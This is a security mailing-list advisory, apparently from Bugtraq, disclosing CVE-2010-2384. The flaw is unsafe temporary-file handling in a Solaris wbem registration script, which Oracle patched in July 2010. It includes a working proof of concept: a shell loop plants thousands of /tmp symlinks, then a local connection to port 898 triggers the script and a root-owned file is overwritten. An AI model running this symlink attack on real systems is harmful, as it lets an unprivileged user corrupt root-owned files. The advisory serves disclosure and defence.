|
|
 |
| New User, Welcome! Login |
CVE-2010-2384: Solaris wbem unsafe use of temporary files
| From: |
Frank Stuart <fstuart fstuart com> |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
CVE-2010-2384: Solaris wbem unsafe use of temporary files |
| Date: |
Mon - Jul 19, 2010 07:54 PM |
Attachments:
fstuart.vcf
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Below is the full disclosure information for CVE-2010-2384. It was
reported to security-alert@sun.com on 3 January, 2010 and assigned Sun
bug 6913886.
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).
- ------
When the wbem service is enabled
but hasn't been used before, it will run
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited
by an unprivileged local user like this:
$ id
uid=101(fstuart) gid=14(sysadmin)
$ cd /tmp
$ x=0
$ while [ "$x" -ne 30000 ] ;do
> ln -s /etc/important /tmp/dummy.$x
> x=$(expr "$x" + 1)
> done
$ ls -dl /etc/important
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important
$ cat /etc/important
This is an important file!
EOF
$ telnet localhost 898
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
^]
telnet> quit
Connection to localhost closed.
$ cat /etc/important
/<\/Scope>/ {
n
i\
<Folder TreeDisplay="false"> \
<Name>SUNWrmui Bootstrap Folder</Name> \
<Description>This a temporary folder to workaround a bug. It
should be deleted during install. But if you do see it in the toolbox
editor, do NOT delete it.</Description> \
<Icon>status_16.gif</Icon> \
<LargeIcon>status_32.gif</LargeIcon> \
</Folder>
}
SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be
exploited.
- ------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEVAwUBTEUMPmKGA6cQSpZSAQJXogf+PNSJwfSchgycCWHVpqknVm4KKJ1s/m0y
SWmbzxkoTuKR3hrW7cAPbUb2RHU92Ew587/uPIXhpUCaTrYImJUU9EYHoo132ZpL
KNEXQeqzMi2qaxQU6mkQBEA9Qc3VDh0kDcbDPjPJKShqb2k84CBq6ni39vb1zRlY
SVMldGCS5XflnjtINiwzdmnjNCVkMT4wtuFo3f2GhZaNKEOAKr2LVZT1KkYA6fmY
a6E5XFisQPBbVSPhN82ed7v73GTe5o09SDN3bHozV7x2ki4vxjCFau/hGG/NVNVD
NddIRtqVu8uodrI5hyt1gNXtTV9rT40GiAyOA1iuQHM7FmB8SXKI8w==
=8592
-----END PGP SIGNATURE-----
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
